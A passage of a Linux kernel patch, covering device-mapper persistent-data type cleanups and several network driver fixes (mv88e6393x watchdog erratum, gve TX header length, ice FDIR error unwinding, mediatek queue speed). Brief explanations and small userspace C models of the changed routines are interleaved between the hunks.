+ 	struct shadow_spine spine;
+ 	struct btree_node *n;
+@@ -1412,7 +1412,7 @@ static int walk_node(struct dm_btree_info *info, dm_block_t block,
+ 		     void *context)
+ {
+ 	int r;
+-	unsigned i, nr;
++	unsigned int i, nr;
+ 	struct dm_block *node;
+ 	struct btree_node *n;
+ 	uint64_t keys;
+@@ -1455,7 +1455,7 @@ EXPORT_SYMBOL_GPL(dm_btree_walk);
+ 
+ static void prefetch_values(struct dm_btree_cursor *c)
+ {
+-	unsigned i, nr;
++	unsigned int i, nr;
+ 	__le64 value_le;
+ 	struct cursor_node *n = c->nodes + c->depth - 1;
+ 	struct btree_node *bn = dm_block_data(n->b);
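
redistribute2() above balances two siblings around total / 2, copying entries across and shifting the right node to open or close the gap. A userspace model over key arrays only (values elided for brevity):

#include <stdint.h>
#include <stdio.h>
#include <string.h>

static void redistribute2_model(uint64_t *left, unsigned int *nr_left,
				uint64_t *right, unsigned int *nr_right)
{
	unsigned int total = *nr_left + *nr_right;
	unsigned int target_left = total / 2;

	if (*nr_left < target_left) {
		unsigned int delta = target_left - *nr_left;

		/* take delta entries off the front of right, then shift_down */
		memcpy(left + *nr_left, right, delta * sizeof(uint64_t));
		memmove(right, right + delta, (*nr_right - delta) * sizeof(uint64_t));
	} else if (*nr_left > target_left) {
		unsigned int delta = *nr_left - target_left;

		/* shift_up right to make room, then move left's tail over */
		memmove(right + delta, right, *nr_right * sizeof(uint64_t));
		memcpy(right, left + target_left, delta * sizeof(uint64_t));
	}
	*nr_left = target_left;
	*nr_right = total - target_left;
}

int main(void)
{
	uint64_t l[8] = { 1, 2, 3, 4, 5 }, r[8] = { 9 };
	unsigned int nl = 5, nr = 1;

	redistribute2_model(l, &nl, r, &nr);
	printf("nl=%u nr=%u r0=%llu\n", nl, nr, (unsigned long long)r[0]); /* 3 3 4 */
	return 0;
}
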
+diff --git a/drivers/md/persistent-data/dm-btree.h b/drivers/md/persistent-data/dm-btree.h
+index d2ae5aa4d00b6..5566e7c32e829 100644
+--- a/drivers/md/persistent-data/dm-btree.h
++++ b/drivers/md/persistent-data/dm-btree.h
+@@ -58,14 +58,14 @@ struct dm_btree_value_type {
+ 	 * somewhere.) This method is _not_ called for insertion of a new
+ 	 * value: It is assumed the ref count is already 1.
+ 	 */
+-	void (*inc)(void *context, const void *value, unsigned count);
++	void (*inc)(void *context, const void *value, unsigned int count);
+ 
+ 	/*
+ 	 * These values are being deleted.  The btree takes care of freeing
+ 	 * the memory pointed to by @value.  Often the del function just
+ 	 * needs to decrement a reference count somewhere.
+ 	 */
+-	void (*dec)(void *context, const void *value, unsigned count);
++	void (*dec)(void *context, const void *value, unsigned int count);
+ 
+ 	/*
+ 	 * A test for equality between two values.  When a value is
+@@ -84,7 +84,7 @@ struct dm_btree_info {
+ 	/*
+ 	 * Number of nested btrees. (Not the depth of a single tree.)
+ 	 */
+-	unsigned levels;
++	unsigned int levels;
+ 	struct dm_btree_value_type value_type;
+ };
+ 
+@@ -149,7 +149,7 @@ int dm_btree_remove(struct dm_btree_info *info, dm_block_t root,
+  */
+ int dm_btree_remove_leaves(struct dm_btree_info *info, dm_block_t root,
+ 			   uint64_t *keys, uint64_t end_key,
+-			   dm_block_t *new_root, unsigned *nr_removed);
++			   dm_block_t *new_root, unsigned int *nr_removed);
+ 
+ /*
+  * Returns < 0 on failure.  Otherwise the number of key entries that have
+@@ -188,7 +188,7 @@ int dm_btree_walk(struct dm_btree_info *info, dm_block_t root,
+ 
+ struct cursor_node {
+ 	struct dm_block *b;
+-	unsigned index;
++	unsigned int index;
+ };
+ 
+ struct dm_btree_cursor {
+@@ -196,7 +196,7 @@ struct dm_btree_cursor {
+ 	dm_block_t root;
+ 
+ 	bool prefetch_leaves;
+-	unsigned depth;
++	unsigned int depth;
+ 	struct cursor_node nodes[DM_BTREE_CURSOR_MAX_DEPTH];
+ };
+ 
+diff --git a/drivers/md/persistent-data/dm-persistent-data-internal.h b/drivers/md/persistent-data/dm-persistent-data-internal.h
+index c49e26fff36c8..b945a2be93fb2 100644
+--- a/drivers/md/persistent-data/dm-persistent-data-internal.h
++++ b/drivers/md/persistent-data/dm-persistent-data-internal.h
+@@ -9,11 +9,11 @@
+ 
+ #include "dm-block-manager.h"
+ 
+-static inline unsigned dm_hash_block(dm_block_t b, unsigned hash_mask)
++static inline unsigned int dm_hash_block(dm_block_t b, unsigned int hash_mask)
+ {
+-	const unsigned BIG_PRIME = 4294967291UL;
++	const unsigned int BIG_PRIME = 4294967291UL;
+ 
+-	return (((unsigned) b) * BIG_PRIME) & hash_mask;
++	return (((unsigned int) b) * BIG_PRIME) & hash_mask;
+ }
+ 
+ #endif	/* _PERSISTENT_DATA_INTERNAL_H */
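
dm_hash_block() above is a multiplicative hash: the block number is truncated to 32 bits, multiplied by the largest prime below 2^32, and masked, so hash_mask must be a power of two minus one. Standalone:

#include <stdint.h>
#include <stdio.h>

static unsigned int hash_block(uint64_t b, unsigned int hash_mask)
{
	const unsigned int BIG_PRIME = 4294967291U;  /* largest prime < 2^32 */

	/* the truncating cast is intentional; only the low 32 bits feed the hash */
	return ((unsigned int)b * BIG_PRIME) & hash_mask;
}

int main(void)
{
	printf("%u\n", hash_block(12345, 255));   /* a bucket in [0, 255] */
	return 0;
}
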
+diff --git a/drivers/md/persistent-data/dm-space-map-common.c b/drivers/md/persistent-data/dm-space-map-common.c
+index bfbfa750e0160..af800efed9f3c 100644
+--- a/drivers/md/persistent-data/dm-space-map-common.c
++++ b/drivers/md/persistent-data/dm-space-map-common.c
+@@ -126,7 +126,7 @@ static void *dm_bitmap_data(struct dm_block *b)
+ 
+ #define WORD_MASK_HIGH 0xAAAAAAAAAAAAAAAAULL
+ 
+-static unsigned dm_bitmap_word_used(void *addr, unsigned b)
++static unsigned int dm_bitmap_word_used(void *addr, unsigned int b)
+ {
+ 	__le64 *words_le = addr;
+ 	__le64 *w_le = words_le + (b >> ENTRIES_SHIFT);
+@@ -137,11 +137,11 @@ static unsigned dm_bitmap_word_used(void *addr, unsigned b)
+ 	return !(~bits & mask);
+ }
+ 
+-static unsigned sm_lookup_bitmap(void *addr, unsigned b)
++static unsigned int sm_lookup_bitmap(void *addr, unsigned int b)
+ {
+ 	__le64 *words_le = addr;
+ 	__le64 *w_le = words_le + (b >> ENTRIES_SHIFT);
+-	unsigned hi, lo;
++	unsigned int hi, lo;
+ 
+ 	b = (b & (ENTRIES_PER_WORD - 1)) << 1;
+ 	hi = !!test_bit_le(b, (void *) w_le);
+@@ -149,7 +149,7 @@ static unsigned sm_lookup_bitmap(void *addr, unsigned b)
+ 	return (hi << 1) | lo;
+ }
+ 
+-static void sm_set_bitmap(void *addr, unsigned b, unsigned val)
++static void sm_set_bitmap(void *addr, unsigned int b, unsigned int val)
+ {
+ 	__le64 *words_le = addr;
+ 	__le64 *w_le = words_le + (b >> ENTRIES_SHIFT);
+@@ -167,8 +167,8 @@ static void sm_set_bitmap(void *addr, unsigned b, unsigned val)
+ 		__clear_bit_le(b + 1, (void *) w_le);
+ }
+ 
+-static int sm_find_free(void *addr, unsigned begin, unsigned end,
+-			unsigned *result)
++static int sm_find_free(void *addr, unsigned int begin, unsigned int end,
++			unsigned int *result)
+ {
+ 	while (begin < end) {
+ 		if (!(begin & (ENTRIES_PER_WORD - 1)) &&
+@@ -237,7 +237,7 @@ int sm_ll_extend(struct ll_disk *ll, dm_block_t extra_blocks)
+ {
+ 	int r;
+ 	dm_block_t i, nr_blocks, nr_indexes;
+-	unsigned old_blocks, blocks;
++	unsigned int old_blocks, blocks;
+ 
+ 	nr_blocks = ll->nr_blocks + extra_blocks;
+ 	old_blocks = dm_sector_div_up(ll->nr_blocks, ll->entries_per_block);
+@@ -351,7 +351,7 @@ int sm_ll_find_free_block(struct ll_disk *ll, dm_block_t begin,
+ 
+ 	for (i = index_begin; i < index_end; i++, begin = 0) {
+ 		struct dm_block *blk;
+-		unsigned position;
++		unsigned int position;
+ 		uint32_t bit_end;
+ 
+ 		r = ll->load_ie(ll, i, &ie_disk);
+@@ -369,7 +369,7 @@ int sm_ll_find_free_block(struct ll_disk *ll, dm_block_t begin,
+ 		bit_end = (i == index_end - 1) ?  end : ll->entries_per_block;
+ 
+ 		r = sm_find_free(dm_bitmap_data(blk),
+-				 max_t(unsigned, begin, le32_to_cpu(ie_disk.none_free_before)),
++				 max_t(unsigned int, begin, le32_to_cpu(ie_disk.none_free_before)),
+ 				 bit_end, &position);
+ 		if (r == -ENOSPC) {
+ 			/*
+@@ -1097,7 +1097,7 @@ static inline int ie_cache_writeback(struct ll_disk *ll, struct ie_cache *iec)
+ 			       &iec->index, &iec->ie, &ll->bitmap_root);
+ }
+ 
+-static inline unsigned hash_index(dm_block_t index)
++static inline unsigned int hash_index(dm_block_t index)
+ {
+ 	return dm_hash_block(index, IE_CACHE_MASK);
+ }
+@@ -1106,7 +1106,7 @@ static int disk_ll_load_ie(struct ll_disk *ll, dm_block_t index,
+ 			   struct disk_index_entry *ie)
+ {
+ 	int r;
+-	unsigned h = hash_index(index);
++	unsigned int h = hash_index(index);
+ 	struct ie_cache *iec = ll->ie_cache + h;
+ 
+ 	if (iec->valid) {
+@@ -1137,7 +1137,7 @@ static int disk_ll_save_ie(struct ll_disk *ll, dm_block_t index,
+ 			   struct disk_index_entry *ie)
+ {
+ 	int r;
+-	unsigned h = hash_index(index);
++	unsigned int h = hash_index(index);
+ 	struct ie_cache *iec = ll->ie_cache + h;
+ 
+ 	ll->bitmap_index_changed = true;
+@@ -1164,7 +1164,7 @@ static int disk_ll_save_ie(struct ll_disk *ll, dm_block_t index,
+ 
+ static int disk_ll_init_index(struct ll_disk *ll)
+ {
+-	unsigned i;
++	unsigned int i;
+ 	for (i = 0; i < IE_CACHE_SIZE; i++) {
+ 		struct ie_cache *iec = ll->ie_cache + i;
+ 		iec->valid = false;
+@@ -1186,7 +1186,7 @@ static dm_block_t disk_ll_max_entries(struct ll_disk *ll)
+ static int disk_ll_commit(struct ll_disk *ll)
+ {
+ 	int r = 0;
+-	unsigned i;
++	unsigned int i;
+ 
+ 	for (i = 0; i < IE_CACHE_SIZE; i++) {
+ 		struct ie_cache *iec = ll->ie_cache + i;
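
sm_lookup_bitmap() above reads 2-bit entries packed as adjacent bit pairs inside little-endian 64-bit words, 32 entries per word. A simplified host-endian model of the extraction (endianness handling and the test_bit_le() bit ordering are glossed over here):

#include <stdint.h>
#include <stdio.h>

#define ENTRIES_PER_WORD 32u   /* 64-bit words, 2 bits per entry */

static unsigned int lookup_2bit(const uint64_t *words, unsigned int b)
{
	const uint64_t w = words[b / ENTRIES_PER_WORD];
	unsigned int bit = (b & (ENTRIES_PER_WORD - 1)) << 1;
	unsigned int hi = (w >> bit) & 1;
	unsigned int lo = (w >> (bit + 1)) & 1;

	return (hi << 1) | lo;
}

int main(void)
{
	uint64_t words[1] = { 0x3 };   /* entry 0 holds value 3 (both bits set) */

	printf("%u\n", lookup_2bit(words, 0));   /* 3 */
	return 0;
}
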
+diff --git a/drivers/md/persistent-data/dm-space-map-metadata.c b/drivers/md/persistent-data/dm-space-map-metadata.c
+index 392ae26134a4e..0d1fcdf29c835 100644
+--- a/drivers/md/persistent-data/dm-space-map-metadata.c
++++ b/drivers/md/persistent-data/dm-space-map-metadata.c
+@@ -94,8 +94,8 @@ struct block_op {
+ };
+ 
+ struct bop_ring_buffer {
+-	unsigned begin;
+-	unsigned end;
++	unsigned int begin;
++	unsigned int end;
+ 	struct block_op bops[MAX_RECURSIVE_ALLOCATIONS + 1];
+ };
+ 
+@@ -110,9 +110,9 @@ static bool brb_empty(struct bop_ring_buffer *brb)
+ 	return brb->begin == brb->end;
+ }
+ 
+-static unsigned brb_next(struct bop_ring_buffer *brb, unsigned old)
++static unsigned int brb_next(struct bop_ring_buffer *brb, unsigned int old)
+ {
+-	unsigned r = old + 1;
++	unsigned int r = old + 1;
+ 	return r >= ARRAY_SIZE(brb->bops) ? 0 : r;
+ }
+ 
+@@ -120,7 +120,7 @@ static int brb_push(struct bop_ring_buffer *brb,
+ 		    enum block_op_type type, dm_block_t b, dm_block_t e)
+ {
+ 	struct block_op *bop;
+-	unsigned next = brb_next(brb, brb->end);
++	unsigned int next = brb_next(brb, brb->end);
+ 
+ 	/*
+ 	 * We don't allow the last bop to be filled, this way we can
+@@ -171,8 +171,8 @@ struct sm_metadata {
+ 
+ 	dm_block_t begin;
+ 
+-	unsigned recursion_count;
+-	unsigned allocated_this_transaction;
++	unsigned int recursion_count;
++	unsigned int allocated_this_transaction;
+ 	struct bop_ring_buffer uncommitted;
+ 
+ 	struct threshold threshold;
+@@ -300,9 +300,9 @@ static int sm_metadata_get_count(struct dm_space_map *sm, dm_block_t b,
+ 				 uint32_t *result)
+ {
+ 	int r;
+-	unsigned i;
++	unsigned int i;
+ 	struct sm_metadata *smm = container_of(sm, struct sm_metadata, sm);
+-	unsigned adjustment = 0;
++	unsigned int adjustment = 0;
+ 
+ 	/*
+ 	 * We may have some uncommitted adjustments to add.  This list
+@@ -340,7 +340,7 @@ static int sm_metadata_count_is_more_than_one(struct dm_space_map *sm,
+ 					      dm_block_t b, int *result)
+ {
+ 	int r, adjustment = 0;
+-	unsigned i;
++	unsigned int i;
+ 	struct sm_metadata *smm = container_of(sm, struct sm_metadata, sm);
+ 	uint32_t rc;
+ 
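
The bop ring buffer above distinguishes full from empty by never filling the last slot: begin == end always means empty, and a push fails when the next end would collide with begin. A standalone model (the capacity value is illustrative; the kernel sizes it as MAX_RECURSIVE_ALLOCATIONS + 1):

#include <stdio.h>

#define NR_BOPS 5

struct ring {
	unsigned int begin, end;
	int bops[NR_BOPS];
};

static unsigned int ring_next(unsigned int old)
{
	unsigned int r = old + 1;

	return r >= NR_BOPS ? 0 : r;
}

/* one slot is always left empty so begin == end can only mean "empty" */
static int ring_push(struct ring *rb, int op)
{
	unsigned int next = ring_next(rb->end);

	if (next == rb->begin)
		return -1;   /* full */
	rb->bops[rb->end] = op;
	rb->end = next;
	return 0;
}

int main(void)
{
	struct ring rb = { 0, 0, { 0 } };
	int i, pushed = 0;

	for (i = 0; i < NR_BOPS; i++)
		pushed += ring_push(&rb, i) == 0;
	printf("%d\n", pushed);   /* 4: usable capacity is NR_BOPS - 1 */
	return 0;
}
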
+diff --git a/drivers/md/persistent-data/dm-transaction-manager.c b/drivers/md/persistent-data/dm-transaction-manager.c
+index 16643fc974e84..39885f8355847 100644
+--- a/drivers/md/persistent-data/dm-transaction-manager.c
++++ b/drivers/md/persistent-data/dm-transaction-manager.c
+@@ -28,14 +28,14 @@ struct prefetch_set {
+ 	dm_block_t blocks[PREFETCH_SIZE];
+ };
+ 
+-static unsigned prefetch_hash(dm_block_t b)
++static unsigned int prefetch_hash(dm_block_t b)
+ {
+ 	return hash_64(b, PREFETCH_BITS);
+ }
+ 
+ static void prefetch_wipe(struct prefetch_set *p)
+ {
+-	unsigned i;
++	unsigned int i;
+ 	for (i = 0; i < PREFETCH_SIZE; i++)
+ 		p->blocks[i] = PREFETCH_SENTINEL;
+ }
+@@ -48,7 +48,7 @@ static void prefetch_init(struct prefetch_set *p)
+ 
+ static void prefetch_add(struct prefetch_set *p, dm_block_t b)
+ {
+-	unsigned h = prefetch_hash(b);
++	unsigned int h = prefetch_hash(b);
+ 
+ 	mutex_lock(&p->lock);
+ 	if (p->blocks[h] == PREFETCH_SENTINEL)
+@@ -59,7 +59,7 @@ static void prefetch_add(struct prefetch_set *p, dm_block_t b)
+ 
+ static void prefetch_issue(struct prefetch_set *p, struct dm_block_manager *bm)
+ {
+-	unsigned i;
++	unsigned int i;
+ 
+ 	mutex_lock(&p->lock);
+ 
+@@ -103,7 +103,7 @@ struct dm_transaction_manager {
+ static int is_shadow(struct dm_transaction_manager *tm, dm_block_t b)
+ {
+ 	int r = 0;
+-	unsigned bucket = dm_hash_block(b, DM_HASH_MASK);
++	unsigned int bucket = dm_hash_block(b, DM_HASH_MASK);
+ 	struct shadow_info *si;
+ 
+ 	spin_lock(&tm->lock);
+@@ -123,7 +123,7 @@ static int is_shadow(struct dm_transaction_manager *tm, dm_block_t b)
+  */
+ static void insert_shadow(struct dm_transaction_manager *tm, dm_block_t b)
+ {
+-	unsigned bucket;
++	unsigned int bucket;
+ 	struct shadow_info *si;
+ 
+ 	si = kmalloc(sizeof(*si), GFP_NOIO);
+@@ -393,11 +393,11 @@ void dm_tm_dec_range(struct dm_transaction_manager *tm, dm_block_t b, dm_block_t
+ EXPORT_SYMBOL_GPL(dm_tm_dec_range);
+ 
+ void dm_tm_with_runs(struct dm_transaction_manager *tm,
+-		     const __le64 *value_le, unsigned count, dm_tm_run_fn fn)
++		     const __le64 *value_le, unsigned int count, dm_tm_run_fn fn)
+ {
+ 	uint64_t b, begin, end;
+ 	bool in_run = false;
+-	unsigned i;
++	unsigned int i;
+ 
+ 	for (i = 0; i < count; i++, value_le++) {
+ 		b = le64_to_cpu(*value_le);
+diff --git a/drivers/md/persistent-data/dm-transaction-manager.h b/drivers/md/persistent-data/dm-transaction-manager.h
+index 906c02ed0365b..0f573a4a01aeb 100644
+--- a/drivers/md/persistent-data/dm-transaction-manager.h
++++ b/drivers/md/persistent-data/dm-transaction-manager.h
+@@ -111,7 +111,7 @@ void dm_tm_dec_range(struct dm_transaction_manager *tm, dm_block_t b, dm_block_t
+  */
+ typedef void (*dm_tm_run_fn)(struct dm_transaction_manager *, dm_block_t, dm_block_t);
+ void dm_tm_with_runs(struct dm_transaction_manager *tm,
+-		     const __le64 *value_le, unsigned count, dm_tm_run_fn fn);
++		     const __le64 *value_le, unsigned int count, dm_tm_run_fn fn);
+ 
+ int dm_tm_ref(struct dm_transaction_manager *tm, dm_block_t b, uint32_t *result);
+ 
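
dm_tm_with_runs(), retyped above, exists to batch reference-count changes: it walks an array of little-endian block numbers and invokes the run callback once per contiguous range. A host-endian sketch of that coalescing (the real callback also takes the transaction manager; simplified here):

#include <stdint.h>
#include <stdio.h>

typedef void (*run_fn)(uint64_t begin, uint64_t end);   /* end is exclusive */

static void with_runs(const uint64_t *blocks, unsigned int count, run_fn fn)
{
	uint64_t begin = 0, end = 0;
	int in_run = 0;
	unsigned int i;

	for (i = 0; i < count; i++) {
		uint64_t b = blocks[i];

		if (in_run && b == end) {
			end++;                 /* extend the current run */
		} else {
			if (in_run)
				fn(begin, end);  /* flush the previous run */
			begin = b;
			end = b + 1;
			in_run = 1;
		}
	}
	if (in_run)
		fn(begin, end);
}

static void print_run(uint64_t begin, uint64_t end)
{
	printf("[%llu, %llu)\n", (unsigned long long)begin, (unsigned long long)end);
}

int main(void)
{
	uint64_t blocks[] = { 5, 6, 7, 9, 10, 20 };

	with_runs(blocks, 6, print_run);   /* [5,8) [9,11) [20,21) */
	return 0;
}
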
+diff --git a/drivers/net/dsa/mv88e6xxx/chip.c b/drivers/net/dsa/mv88e6xxx/chip.c
+index 8211a4d373e81..e57d86484a3a4 100644
+--- a/drivers/net/dsa/mv88e6xxx/chip.c
++++ b/drivers/net/dsa/mv88e6xxx/chip.c
+@@ -5518,7 +5518,7 @@ static const struct mv88e6xxx_ops mv88e6393x_ops = {
+ 	 * .port_set_upstream_port method.
+ 	 */
+ 	.set_egress_port = mv88e6393x_set_egress_port,
+-	.watchdog_ops = &mv88e6390_watchdog_ops,
++	.watchdog_ops = &mv88e6393x_watchdog_ops,
+ 	.mgmt_rsvd2cpu = mv88e6393x_port_mgmt_rsvd2cpu,
+ 	.pot_clear = mv88e6xxx_g2_pot_clear,
+ 	.reset = mv88e6352_g1_reset,
+diff --git a/drivers/net/dsa/mv88e6xxx/global2.c b/drivers/net/dsa/mv88e6xxx/global2.c
+index fa65ecd9cb853..ec49939968fac 100644
+--- a/drivers/net/dsa/mv88e6xxx/global2.c
++++ b/drivers/net/dsa/mv88e6xxx/global2.c
+@@ -931,6 +931,26 @@ const struct mv88e6xxx_irq_ops mv88e6390_watchdog_ops = {
+ 	.irq_free = mv88e6390_watchdog_free,
+ };
+ 
++static int mv88e6393x_watchdog_action(struct mv88e6xxx_chip *chip, int irq)
++{
++	mv88e6390_watchdog_action(chip, irq);
++
++	/* Fix for clearing the force WD event bit.
++	 * Unreleased erratum on mv88e6393x.
++	 */
++	mv88e6xxx_g2_write(chip, MV88E6390_G2_WDOG_CTL,
++			   MV88E6390_G2_WDOG_CTL_UPDATE |
++			   MV88E6390_G2_WDOG_CTL_PTR_EVENT);
++
++	return IRQ_HANDLED;
++}
++
++const struct mv88e6xxx_irq_ops mv88e6393x_watchdog_ops = {
++	.irq_action = mv88e6393x_watchdog_action,
++	.irq_setup = mv88e6390_watchdog_setup,
++	.irq_free = mv88e6390_watchdog_free,
++};
++
+ static irqreturn_t mv88e6xxx_g2_watchdog_thread_fn(int irq, void *dev_id)
+ {
+ 	struct mv88e6xxx_chip *chip = dev_id;
+diff --git a/drivers/net/dsa/mv88e6xxx/global2.h b/drivers/net/dsa/mv88e6xxx/global2.h
+index 7536b8b0ad011..c05fad5c9f19d 100644
+--- a/drivers/net/dsa/mv88e6xxx/global2.h
++++ b/drivers/net/dsa/mv88e6xxx/global2.h
+@@ -363,6 +363,7 @@ int mv88e6xxx_g2_device_mapping_write(struct mv88e6xxx_chip *chip, int target,
+ extern const struct mv88e6xxx_irq_ops mv88e6097_watchdog_ops;
+ extern const struct mv88e6xxx_irq_ops mv88e6250_watchdog_ops;
+ extern const struct mv88e6xxx_irq_ops mv88e6390_watchdog_ops;
++extern const struct mv88e6xxx_irq_ops mv88e6393x_watchdog_ops;
+ 
+ extern const struct mv88e6xxx_avb_ops mv88e6165_avb_ops;
+ extern const struct mv88e6xxx_avb_ops mv88e6352_avb_ops;
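
The new mv88e6393x watchdog ops reuse the 6390 setup/free hooks and only wrap the action handler to add the extra event-clearing write for the erratum. The delegation shape, as a standalone model (names and prints illustrative, not the driver API):

#include <stdio.h>

struct chip;

struct irq_ops {
	int (*irq_action)(struct chip *chip, int irq);
};

static int base_action(struct chip *chip, int irq)
{
	printf("shared watchdog action\n");
	return 1;   /* IRQ_HANDLED stand-in */
}

/* erratum workaround: run the shared handler, then clear the event bit
 * the hardware fails to clear on its own
 */
static int workaround_action(struct chip *chip, int irq)
{
	base_action(chip, irq);
	printf("extra write: clear forced-WD event\n");
	return 1;
}

static const struct irq_ops wrapped_ops = { .irq_action = workaround_action };

int main(void)
{
	return wrapped_ops.irq_action(NULL, 0) != 1;
}
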
+diff --git a/drivers/net/ethernet/google/gve/gve.h b/drivers/net/ethernet/google/gve/gve.h
+index 64eb0442c82fd..005cb9dfe078b 100644
+--- a/drivers/net/ethernet/google/gve/gve.h
++++ b/drivers/net/ethernet/google/gve/gve.h
+@@ -47,6 +47,8 @@
+ 
+ #define GVE_RX_BUFFER_SIZE_DQO 2048
+ 
++#define GVE_GQ_TX_MIN_PKT_DESC_BYTES 182
++
+ /* Each slot in the desc ring has a 1:1 mapping to a slot in the data ring */
+ struct gve_rx_desc_queue {
+ 	struct gve_rx_desc *desc_ring; /* the descriptor ring */
+diff --git a/drivers/net/ethernet/google/gve/gve_tx.c b/drivers/net/ethernet/google/gve/gve_tx.c
+index 4888bf05fbedb..5e11b82367545 100644
+--- a/drivers/net/ethernet/google/gve/gve_tx.c
++++ b/drivers/net/ethernet/google/gve/gve_tx.c
+@@ -284,8 +284,8 @@ static inline int gve_skb_fifo_bytes_required(struct gve_tx_ring *tx,
+ 	int bytes;
+ 	int hlen;
+ 
+-	hlen = skb_is_gso(skb) ? skb_checksum_start_offset(skb) +
+-				 tcp_hdrlen(skb) : skb_headlen(skb);
++	hlen = skb_is_gso(skb) ? skb_checksum_start_offset(skb) + tcp_hdrlen(skb) :
++				 min_t(int, GVE_GQ_TX_MIN_PKT_DESC_BYTES, skb->len);
+ 
+ 	pad_bytes = gve_tx_fifo_pad_alloc_one_frag(&tx->tx_fifo,
+ 						   hlen);
+@@ -454,13 +454,11 @@ static int gve_tx_add_skb_copy(struct gve_priv *priv, struct gve_tx_ring *tx, st
+ 	pkt_desc = &tx->desc[idx];
+ 
+ 	l4_hdr_offset = skb_checksum_start_offset(skb);
+-	/* If the skb is gso, then we want the tcp header in the first segment
+-	 * otherwise we want the linear portion of the skb (which will contain
+-	 * the checksum because skb->csum_start and skb->csum_offset are given
+-	 * relative to skb->head) in the first segment.
++	/* If the skb is gso, then we want the tcp header alone in the first segment,
++	 * otherwise we want the minimum required by the gVNIC spec.
+ 	 */
+ 	hlen = is_gso ? l4_hdr_offset + tcp_hdrlen(skb) :
+-			skb_headlen(skb);
++			min_t(int, GVE_GQ_TX_MIN_PKT_DESC_BYTES, skb->len);
+ 
+ 	info->skb =  skb;
+ 	/* We don't want to split the header, so if necessary, pad to the end
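
Both hunks above replace skb_headlen() on the non-GSO path with a clamp: the first descriptor now covers at most GVE_GQ_TX_MIN_PKT_DESC_BYTES of the packet instead of the whole linear area. The arithmetic, standalone:

#include <stdio.h>

#define GVE_GQ_TX_MIN_PKT_DESC_BYTES 182

static int min_int(int a, int b) { return a < b ? a : b; }

/* first-descriptor length for the non-GSO path after this patch */
static int first_desc_len(int skb_len)
{
	return min_int(GVE_GQ_TX_MIN_PKT_DESC_BYTES, skb_len);
}

int main(void)
{
	printf("%d %d\n", first_desc_len(60), first_desc_len(1514));  /* 60 182 */
	return 0;
}
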
+diff --git a/drivers/net/ethernet/intel/ice/ice_virtchnl_fdir.c b/drivers/net/ethernet/intel/ice/ice_virtchnl_fdir.c
+index a2645ff3100e4..7f72604079723 100644
+--- a/drivers/net/ethernet/intel/ice/ice_virtchnl_fdir.c
++++ b/drivers/net/ethernet/intel/ice/ice_virtchnl_fdir.c
+@@ -541,6 +541,21 @@ static void ice_vc_fdir_rem_prof_all(struct ice_vf *vf)
+ 	}
+ }
+ 
++/**
++ * ice_vc_fdir_reset_cnt_all - reset all FDIR counters for this VF FDIR
++ * @fdir: pointer to the VF FDIR structure
++ */
++static void ice_vc_fdir_reset_cnt_all(struct ice_vf_fdir *fdir)
++{
++	enum ice_fltr_ptype flow;
++
++	for (flow = ICE_FLTR_PTYPE_NONF_NONE;
++	     flow < ICE_FLTR_PTYPE_MAX; flow++) {
++		fdir->fdir_fltr_cnt[flow][0] = 0;
++		fdir->fdir_fltr_cnt[flow][1] = 0;
++	}
++}
++
+ /**
+  * ice_vc_fdir_has_prof_conflict
+  * @vf: pointer to the VF structure
+@@ -1871,7 +1886,7 @@ int ice_vc_add_fdir_fltr(struct ice_vf *vf, u8 *msg)
+ 		v_ret = VIRTCHNL_STATUS_SUCCESS;
+ 		stat->status = VIRTCHNL_FDIR_FAILURE_RULE_NORESOURCE;
+ 		dev_dbg(dev, "VF %d: set FDIR context failed\n", vf->vf_id);
+-		goto err_free_conf;
++		goto err_rem_entry;
+ 	}
+ 
+ 	ret = ice_vc_fdir_write_fltr(vf, conf, true, is_tun);
+@@ -1880,15 +1895,16 @@ int ice_vc_add_fdir_fltr(struct ice_vf *vf, u8 *msg)
+ 		stat->status = VIRTCHNL_FDIR_FAILURE_RULE_NORESOURCE;
+ 		dev_err(dev, "VF %d: writing FDIR rule failed, ret:%d\n",
+ 			vf->vf_id, ret);
+-		goto err_rem_entry;
++		goto err_clr_irq;
+ 	}
+ 
+ exit:
+ 	kfree(stat);
+ 	return ret;
+ 
+-err_rem_entry:
++err_clr_irq:
+ 	ice_vc_fdir_clear_irq_ctx(vf);
++err_rem_entry:
+ 	ice_vc_fdir_remove_entry(vf, conf, conf->flow_id);
+ err_free_conf:
+ 	devm_kfree(dev, conf);
+@@ -1997,6 +2013,7 @@ void ice_vf_fdir_init(struct ice_vf *vf)
+ 	spin_lock_init(&fdir->ctx_lock);
+ 	fdir->ctx_irq.flags = 0;
+ 	fdir->ctx_done.flags = 0;
++	ice_vc_fdir_reset_cnt_all(fdir);
+ }
+ 
+ /**
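
The relabelled gotos above restore the usual kernel unwind ordering: each error label undoes exactly the steps taken before the matching goto, in reverse. A generic model of that shape (the steps and prints are illustrative, not the ice code):

#include <stdio.h>

static int setup(int fail_at)
{
	if (fail_at == 1)
		goto err;                 /* nothing acquired yet */
	printf("add entry\n");

	if (fail_at == 2)
		goto err_rem_entry;       /* entry added, irq ctx not set */
	printf("set irq ctx\n");

	if (fail_at == 3)
		goto err_clr_irq;         /* both acquired */
	return 0;

err_clr_irq:
	printf("clear irq ctx\n");
err_rem_entry:
	printf("remove entry\n");
err:
	return -1;
}

int main(void)
{
	setup(2);   /* removes the entry without touching the unset irq ctx */
	return 0;
}
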
+diff --git a/drivers/net/ethernet/mediatek/mtk_eth_soc.c b/drivers/net/ethernet/mediatek/mtk_eth_soc.c
+index bd7c18c839d42..f56d4e7d4ae5d 100644
+--- a/drivers/net/ethernet/mediatek/mtk_eth_soc.c
++++ b/drivers/net/ethernet/mediatek/mtk_eth_soc.c
+@@ -703,6 +703,7 @@ static void mtk_mac_link_up(struct phylink_config *config,
+ 		 MAC_MCR_FORCE_RX_FC);
+ 
+ 	/* Configure speed */
++	mac->speed = speed;
+ 	switch (speed) {
+ 	case SPEED_2500:
+ 	case SPEED_1000:
+@@ -3169,6 +3170,9 @@ found:
+ 	if (dp->index >= MTK_QDMA_NUM_QUEUES)
+ 		return NOTIFY_DONE;
+ 
++	if (mac->speed > 0 && mac->speed <= s.base.speed)
++		s.base.speed = 0;
++
+ 	mtk_set_queue_speed(eth, dp->index + 3, s.base.speed);
+ 
+ 	return NOTIFY_DONE;
+diff --git a/drivers/net/ethernet/stmicro/stmmac/dwmac-intel.c b/drivers/net/ethernet/stmicro/stmmac/dwmac-intel.c
+index 13aa919633b47..ab9f876b6df7e 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/dwmac-intel.c
++++ b/drivers/net/ethernet/stmicro/stmmac/dwmac-intel.c
